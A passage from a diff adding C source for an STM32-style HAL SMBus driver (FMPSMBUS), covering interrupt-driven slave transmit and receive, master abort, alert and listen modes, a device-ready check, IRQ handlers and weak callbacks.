FMPSMBUS_GENERATE_START_READ); + } + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Note : The FMPSMBUS interrupts must be enabled after unlocking current process + to avoid the risk of FMPSMBUS interrupt handle execution before current + process unlock */ + FMPSMBUS_Enable_IRQ(hfmpsmbus, FMPSMBUS_IT_RX); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Abort a master/host FMPSMBUS process communication with Interrupt. + * @note This abort can be called only if state is ready + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_Master_Abort_IT(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint16_t DevAddress) +{ + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + /* Keep the same state as previous */ + /* to perform as well the call of the corresponding end of transfer callback */ + if (hfmpsmbus->PreviousState == HAL_FMPSMBUS_STATE_MASTER_BUSY_TX) + { + hfmpsmbus->State = HAL_FMPSMBUS_STATE_MASTER_BUSY_TX; + } + else if (hfmpsmbus->PreviousState == HAL_FMPSMBUS_STATE_MASTER_BUSY_RX) + { + hfmpsmbus->State = HAL_FMPSMBUS_STATE_MASTER_BUSY_RX; + } + else + { + /* Wrong usage of abort function */ + /* This function should be used only in case of abort monitored by master device */ + return HAL_ERROR; + } + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_NONE; + + /* Set NBYTES to 1 to generate a dummy read on FMPSMBUS peripheral */ + /* Set AUTOEND mode, this will generate a NACK then STOP condition to abort the current transfer */ + FMPSMBUS_TransferConfig(hfmpsmbus, DevAddress, 1, FMPSMBUS_AUTOEND_MODE, FMPSMBUS_NO_STARTSTOP); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Note : The FMPSMBUS interrupts must be enabled after unlocking current process + to avoid the risk of FMPSMBUS interrupt handle execution before current + process unlock */ + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_MASTER_BUSY_TX) + { + FMPSMBUS_Enable_IRQ(hfmpsmbus, FMPSMBUS_IT_TX); + } + else if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_MASTER_BUSY_RX) + { + FMPSMBUS_Enable_IRQ(hfmpsmbus, FMPSMBUS_IT_RX); + } + else + { + /* Nothing to do */ + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit in slave/device FMPSMBUS mode an amount of data in non-blocking mode with Interrupt. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPSMBUS_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_Slave_Transmit_IT(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint8_t *pData, uint16_t Size, + uint32_t XferOptions) +{ + /* Check the parameters */ + assert_param(IS_FMPSMBUS_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_LISTEN) == HAL_FMPSMBUS_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0UL)) + { + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + /* Disable Interrupts, to prevent preemption during treatment in case of multicall */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_ADDR | FMPSMBUS_IT_TX); + + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + hfmpsmbus->State = (HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX | HAL_FMPSMBUS_STATE_LISTEN); + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_NONE; + + /* Set SBC bit to manage Acknowledge at each bit */ + hfmpsmbus->Instance->CR1 |= FMPI2C_CR1_SBC; + + /* Enable Address Acknowledge */ + hfmpsmbus->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Prepare transfer parameters */ + hfmpsmbus->pBuffPtr = pData; + hfmpsmbus->XferCount = Size; + hfmpsmbus->XferOptions = XferOptions; + + /* Convert OTHER_xxx XferOptions if any */ + FMPSMBUS_ConvertOtherXferOptions(hfmpsmbus); + + if (Size > MAX_NBYTE_SIZE) + { + hfmpsmbus->XferSize = MAX_NBYTE_SIZE; + } + else + { + hfmpsmbus->XferSize = Size; + } + + /* Set NBYTES to write and reload if size > MAX_NBYTE_SIZE and generate RESTART */ + if ((hfmpsmbus->XferSize < hfmpsmbus->XferCount) && (hfmpsmbus->XferSize == MAX_NBYTE_SIZE)) + { + FMPSMBUS_TransferConfig(hfmpsmbus, 0, (uint8_t)hfmpsmbus->XferSize, + FMPSMBUS_RELOAD_MODE | (hfmpsmbus->XferOptions & FMPSMBUS_SENDPEC_MODE), + FMPSMBUS_NO_STARTSTOP); + } + else + { + /* Set NBYTE to transmit */ + FMPSMBUS_TransferConfig(hfmpsmbus, 0, (uint8_t)hfmpsmbus->XferSize, hfmpsmbus->XferOptions, + FMPSMBUS_NO_STARTSTOP); + + /* If PEC mode is enable, size to transmit should be Size-1 byte, corresponding to PEC byte */ + /* PEC byte is automatically sent by HW block, no need to manage it in Transmit process */ + if (FMPSMBUS_GET_PEC_MODE(hfmpsmbus) != 0UL) + { + hfmpsmbus->XferSize--; + hfmpsmbus->XferCount--; + } + } + + /* Clear ADDR flag after prepare the transfer parameters */ + /* This action will generate an acknowledge to the HOST */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_ADDR); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Note : The FMPSMBUS interrupts must be enabled after unlocking current process + to avoid the risk of FMPSMBUS interrupt handle execution before current + process unlock */ + /* REnable ADDR interrupt */ + FMPSMBUS_Enable_IRQ(hfmpsmbus, FMPSMBUS_IT_TX | FMPSMBUS_IT_ADDR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in slave/device FMPSMBUS mode an amount of data in non-blocking mode with Interrupt. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param XferOptions Options of Transfer, value of @ref FMPSMBUS_XferOptions_definition + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_Slave_Receive_IT(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint8_t *pData, uint16_t Size, + uint32_t XferOptions) +{ + /* Check the parameters */ + assert_param(IS_FMPSMBUS_TRANSFER_OPTIONS_REQUEST(XferOptions)); + + if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_LISTEN) == HAL_FMPSMBUS_STATE_LISTEN) + { + if ((pData == NULL) || (Size == 0UL)) + { + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + /* Disable Interrupts, to prevent preemption during treatment in case of multicall */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_ADDR | FMPSMBUS_IT_RX); + + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + hfmpsmbus->State = (HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX | HAL_FMPSMBUS_STATE_LISTEN); + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_NONE; + + /* Set SBC bit to manage Acknowledge at each bit */ + hfmpsmbus->Instance->CR1 |= FMPI2C_CR1_SBC; + + /* Enable Address Acknowledge */ + hfmpsmbus->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Prepare transfer parameters */ + hfmpsmbus->pBuffPtr = pData; + hfmpsmbus->XferSize = Size; + hfmpsmbus->XferCount = Size; + hfmpsmbus->XferOptions = XferOptions; + + /* Convert OTHER_xxx XferOptions if any */ + FMPSMBUS_ConvertOtherXferOptions(hfmpsmbus); + + /* Set NBYTE to receive */ + /* If XferSize equal "1", or XferSize equal "2" with PEC requested (mean 1 data byte + 1 PEC byte */ + /* no need to set RELOAD bit mode, a ACK will be automatically generated in that case */ + /* else need to set RELOAD bit mode to generate an automatic ACK at each byte Received */ + /* This RELOAD bit will be reset for last BYTE to be receive in FMPSMBUS_Slave_ISR */ + if (((FMPSMBUS_GET_PEC_MODE(hfmpsmbus) != 0UL) && (hfmpsmbus->XferSize == 2U)) || (hfmpsmbus->XferSize == 1U)) + { + FMPSMBUS_TransferConfig(hfmpsmbus, 0, (uint8_t)hfmpsmbus->XferSize, hfmpsmbus->XferOptions, + FMPSMBUS_NO_STARTSTOP); + } + else + { + FMPSMBUS_TransferConfig(hfmpsmbus, 0, 1, hfmpsmbus->XferOptions | FMPSMBUS_RELOAD_MODE, FMPSMBUS_NO_STARTSTOP); + } + + /* Clear ADDR flag after prepare the transfer parameters */ + /* This action will generate an acknowledge to the HOST */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_ADDR); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Note : The FMPSMBUS interrupts must be enabled after unlocking current process + to avoid the risk of FMPSMBUS interrupt handle execution before current + process unlock */ + /* REnable ADDR interrupt */ + FMPSMBUS_Enable_IRQ(hfmpsmbus, FMPSMBUS_IT_RX | FMPSMBUS_IT_ADDR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Enable the Address listen mode with Interrupt. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_EnableListen_IT(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + hfmpsmbus->State = HAL_FMPSMBUS_STATE_LISTEN; + + /* Enable the Address Match interrupt */ + FMPSMBUS_Enable_IRQ(hfmpsmbus, FMPSMBUS_IT_ADDR); + + return HAL_OK; +} + +/** + * @brief Disable the Address listen mode with Interrupt. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_DisableListen_IT(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Disable Address listen mode only if a transfer is not ongoing */ + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_LISTEN) + { + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Disable the Address Match interrupt */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_ADDR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Enable the FMPSMBUS alert mode with Interrupt. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUSx peripheral. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_EnableAlert_IT(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Enable SMBus alert */ + hfmpsmbus->Instance->CR1 |= FMPI2C_CR1_ALERTEN; + + /* Clear ALERT flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_ALERT); + + /* Enable Alert Interrupt */ + FMPSMBUS_Enable_IRQ(hfmpsmbus, FMPSMBUS_IT_ALERT); + + return HAL_OK; +} +/** + * @brief Disable the FMPSMBUS alert mode with Interrupt. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUSx peripheral. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_DisableAlert_IT(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Enable SMBus alert */ + hfmpsmbus->Instance->CR1 &= ~FMPI2C_CR1_ALERTEN; + + /* Disable Alert Interrupt */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_ALERT); + + return HAL_OK; +} + +/** + * @brief Check if target device is ready for communication. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param Trials Number of trials + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_IsDeviceReady(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint16_t DevAddress, uint32_t Trials, + uint32_t Timeout) +{ + uint32_t tickstart; + + __IO uint32_t FMPSMBUS_Trials = 0UL; + + FlagStatus tmp1; + FlagStatus tmp2; + + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_READY) + { + if (__HAL_FMPSMBUS_GET_FLAG(hfmpsmbus, FMPSMBUS_FLAG_BUSY) != RESET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_BUSY; + hfmpsmbus->ErrorCode = HAL_FMPSMBUS_ERROR_NONE; + + do + { + /* Generate Start */ + hfmpsmbus->Instance->CR2 = FMPSMBUS_GENERATE_START(hfmpsmbus->Init.AddressingMode, DevAddress); + + /* No need to Check TC flag, with AUTOEND mode the stop is automatically generated */ + /* Wait until STOPF flag is set or a NACK flag is set*/ + tickstart = HAL_GetTick(); + + tmp1 = __HAL_FMPSMBUS_GET_FLAG(hfmpsmbus, FMPSMBUS_FLAG_STOPF); + tmp2 = __HAL_FMPSMBUS_GET_FLAG(hfmpsmbus, FMPSMBUS_FLAG_AF); + + while ((tmp1 == RESET) && (tmp2 == RESET)) + { + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0UL)) + { + /* Device is ready */ + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Update FMPSMBUS error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_HALTIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + return HAL_ERROR; + } + } + + tmp1 = __HAL_FMPSMBUS_GET_FLAG(hfmpsmbus, FMPSMBUS_FLAG_STOPF); + tmp2 = __HAL_FMPSMBUS_GET_FLAG(hfmpsmbus, FMPSMBUS_FLAG_AF); + } + + /* Check if the NACKF flag has not been set */ + if (__HAL_FMPSMBUS_GET_FLAG(hfmpsmbus, FMPSMBUS_FLAG_AF) == RESET) + { + /* Wait until STOPF flag is reset */ + if (FMPSMBUS_WaitOnFlagUntilTimeout(hfmpsmbus, FMPSMBUS_FLAG_STOPF, RESET, Timeout) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear STOP Flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_STOPF); + + /* Device is ready */ + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + return HAL_OK; + } + else + { + /* Wait until STOPF flag is reset */ + if (FMPSMBUS_WaitOnFlagUntilTimeout(hfmpsmbus, FMPSMBUS_FLAG_STOPF, RESET, Timeout) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear NACK Flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_AF); + + /* Clear STOP Flag, auto generated with autoend*/ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_STOPF); + } + + /* Check if the maximum allowed number of trials has been reached */ + if (FMPSMBUS_Trials == Trials) + { + /* Generate Stop */ + hfmpsmbus->Instance->CR2 |= FMPI2C_CR2_STOP; + + /* Wait until STOPF flag is reset */ + if (FMPSMBUS_WaitOnFlagUntilTimeout(hfmpsmbus, FMPSMBUS_FLAG_STOPF, RESET, Timeout) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear STOP Flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_STOPF); + } + + /* Increment Trials */ + FMPSMBUS_Trials++; + } while (FMPSMBUS_Trials < Trials); + + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Update FMPSMBUS error code */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_HALTIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + return HAL_ERROR; + } + else + { + return HAL_BUSY; + } +} +/** + * @} + */ + +/** @defgroup FMPSMBUS_IRQ_Handler_and_Callbacks IRQ Handler and Callbacks + * @{ + */ + +/** + * @brief Handle FMPSMBUS event interrupt request. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +void HAL_FMPSMBUS_EV_IRQHandler(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Use a local variable to store the current ISR flags */ + /* This action will avoid a wrong treatment due to ISR flags change during interrupt handler */ + uint32_t tmpisrvalue = READ_REG(hfmpsmbus->Instance->ISR); + uint32_t tmpcr1value = READ_REG(hfmpsmbus->Instance->CR1); + + /* FMPSMBUS in mode Transmitter ---------------------------------------------------*/ + if ((FMPSMBUS_CHECK_IT_SOURCE(tmpcr1value, (FMPSMBUS_IT_TCI | FMPSMBUS_IT_STOPI | + FMPSMBUS_IT_NACKI | FMPSMBUS_IT_TXI)) != RESET) && + ((FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_TXIS) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_TCR) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_TC) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_STOPF) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_AF) != RESET))) + { + /* Slave mode selected */ + if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX) == HAL_FMPSMBUS_STATE_SLAVE_BUSY_TX) + { + (void)FMPSMBUS_Slave_ISR(hfmpsmbus, tmpisrvalue); + } + /* Master mode selected */ + else if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_MASTER_BUSY_TX) == HAL_FMPSMBUS_STATE_MASTER_BUSY_TX) + { + (void)FMPSMBUS_Master_ISR(hfmpsmbus, tmpisrvalue); + } + else + { + /* Nothing to do */ + } + } + + /* FMPSMBUS in mode Receiver ----------------------------------------------------*/ + if ((FMPSMBUS_CHECK_IT_SOURCE(tmpcr1value, (FMPSMBUS_IT_TCI | FMPSMBUS_IT_STOPI | + FMPSMBUS_IT_NACKI | FMPSMBUS_IT_RXI)) != RESET) && + ((FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_RXNE) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_TCR) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_TC) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_STOPF) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_AF) != RESET))) + { + /* Slave mode selected */ + if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX) == HAL_FMPSMBUS_STATE_SLAVE_BUSY_RX) + { + (void)FMPSMBUS_Slave_ISR(hfmpsmbus, tmpisrvalue); + } + /* Master mode selected */ + else if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_MASTER_BUSY_RX) == HAL_FMPSMBUS_STATE_MASTER_BUSY_RX) + { + (void)FMPSMBUS_Master_ISR(hfmpsmbus, tmpisrvalue); + } + else + { + /* Nothing to do */ + } + } + + /* FMPSMBUS in mode Listener Only --------------------------------------------------*/ + if (((FMPSMBUS_CHECK_IT_SOURCE(tmpcr1value, FMPSMBUS_IT_ADDRI) != RESET) || + (FMPSMBUS_CHECK_IT_SOURCE(tmpcr1value, FMPSMBUS_IT_STOPI) != RESET) || + (FMPSMBUS_CHECK_IT_SOURCE(tmpcr1value, FMPSMBUS_IT_NACKI) != RESET)) && + ((FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_ADDR) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_STOPF) != RESET) || + (FMPSMBUS_CHECK_FLAG(tmpisrvalue, FMPSMBUS_FLAG_AF) != RESET))) + { + if ((hfmpsmbus->State & HAL_FMPSMBUS_STATE_LISTEN) == HAL_FMPSMBUS_STATE_LISTEN) + { + (void)FMPSMBUS_Slave_ISR(hfmpsmbus, tmpisrvalue); + } + } +} + +/** + * @brief Handle FMPSMBUS error interrupt request. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +void HAL_FMPSMBUS_ER_IRQHandler(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + FMPSMBUS_ITErrorHandler(hfmpsmbus); +} + +/** + * @brief Master Tx Transfer completed callback. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +__weak void HAL_FMPSMBUS_MasterTxCpltCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPSMBUS_MasterTxCpltCallback() could be implemented in the user file + */ +} + +/** + * @brief Master Rx Transfer completed callback. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +__weak void HAL_FMPSMBUS_MasterRxCpltCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPSMBUS_MasterRxCpltCallback() could be implemented in the user file + */ +} + +/** @brief Slave Tx Transfer completed callback. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +__weak void HAL_FMPSMBUS_SlaveTxCpltCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPSMBUS_SlaveTxCpltCallback() could be implemented in the user file + */ +} + +/** + * @brief Slave Rx Transfer completed callback. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +__weak void HAL_FMPSMBUS_SlaveRxCpltCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPSMBUS_SlaveRxCpltCallback() could be implemented in the user file + */ +} + +/** + * @brief Slave Address Match callback. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param TransferDirection Master request Transfer Direction (Write/Read) + * @param AddrMatchCode Address Match Code + * @retval None + */ +__weak void HAL_FMPSMBUS_AddrCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint8_t TransferDirection, + uint16_t AddrMatchCode) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpsmbus); + UNUSED(TransferDirection); + UNUSED(AddrMatchCode); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPSMBUS_AddrCallback() could be implemented in the user file + */ +} + +/** + * @brief Listen Complete callback. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +__weak void HAL_FMPSMBUS_ListenCpltCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPSMBUS_ListenCpltCallback() could be implemented in the user file + */ +} + +/** + * @brief FMPSMBUS error callback. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval None + */ +__weak void HAL_FMPSMBUS_ErrorCallback(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpsmbus); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPSMBUS_ErrorCallback() could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup FMPSMBUS_Exported_Functions_Group3 Peripheral State and Errors functions + * @brief Peripheral State and Errors functions + * +@verbatim + =============================================================================== + ##### Peripheral State and Errors functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the FMPSMBUS handle state. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval HAL state + */ +uint32_t HAL_FMPSMBUS_GetState(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Return FMPSMBUS handle state */ + return hfmpsmbus->State; +} + +/** + * @brief Return the FMPSMBUS error code. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval FMPSMBUS Error Code + */ +uint32_t HAL_FMPSMBUS_GetError(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + return hfmpsmbus->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup FMPSMBUS_Private_Functions FMPSMBUS Private Functions + * @brief Data transfers Private functions + * @{ + */ + +/** + * @brief Interrupt Sub-Routine which handle the Interrupt Flags Master Mode. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @param StatusFlags Value of Interrupt Flags. + * @retval HAL status + */ +static HAL_StatusTypeDef FMPSMBUS_Master_ISR(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t StatusFlags) +{ + uint16_t DevAddress; + + /* Process Locked */ + __HAL_LOCK(hfmpsmbus); + + if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_AF) != RESET) + { + /* Clear NACK Flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_AF); + + /* Set corresponding Error Code */ + /* No need to generate STOP, it is automatically done */ + hfmpsmbus->ErrorCode |= HAL_FMPSMBUS_ERROR_ACKF; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Call the Error callback to inform upper layer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->ErrorCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_ErrorCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + else if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_STOPF) != RESET) + { + /* Check and treat errors if errors occurs during STOP process */ + FMPSMBUS_ITErrorHandler(hfmpsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ + if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_MASTER_BUSY_TX) + { + /* Disable Interrupt */ + FMPSMBUS_Disable_IRQ(hfmpsmbus, FMPSMBUS_IT_TX); + + /* Clear STOP Flag */ + __HAL_FMPSMBUS_CLEAR_FLAG(hfmpsmbus, FMPSMBUS_FLAG_STOPF); + + /* Clear Configuration Register 2 */ + FMPSMBUS_RESET_CR2(hfmpsmbus); + + /* Flush remaining data in Fifo register in case of error occurs before TXEmpty */ + /* Disable the selected FMPSMBUS peripheral */ + __HAL_FMPSMBUS_DISABLE(hfmpsmbus); + + hfmpsmbus->PreviousState = HAL_FMPSMBUS_STATE_READY; + hfmpsmbus->State = HAL_FMPSMBUS_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpsmbus); + + /* Re-enable the selected FMPSMBUS peripheral */ + __HAL_FMPSMBUS_ENABLE(hfmpsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPSMBUS_REGISTER_CALLBACKS == 1) + hfmpsmbus->MasterTxCpltCallback(hfmpsmbus); +#else + HAL_FMPSMBUS_MasterTxCpltCallback(hfmpsmbus); +#endif /* USE_HAL_FMPSMBUS_REGISTER_CALLBACKS */ + } + else if (hfmpsmbus->State == HAL_FMPSMBUS_STATE_MASTER_BUSY_RX) + { + /* Store Last receive data if any */ + if (FMPSMBUS_CHECK_FLAG(StatusFlags, FMPSMBUS_FLAG_RXNE) != RESET) + { + /* Read data from RXDR */ + *hfmpsmbus->pBuffPtr = (uint8_t)(hfmpsmbus->Instance->RXDR); + + /* Increment Buffer pointer */ + hfmpsmbus->pBuffPtr++; + + if ((hfmpsmbus->XferSize > 0U)) + { + hfmpsmbus->XferSize--; + hfmpsmbus->XferCount--; + } + } + + /* Disable Interrupt */ + 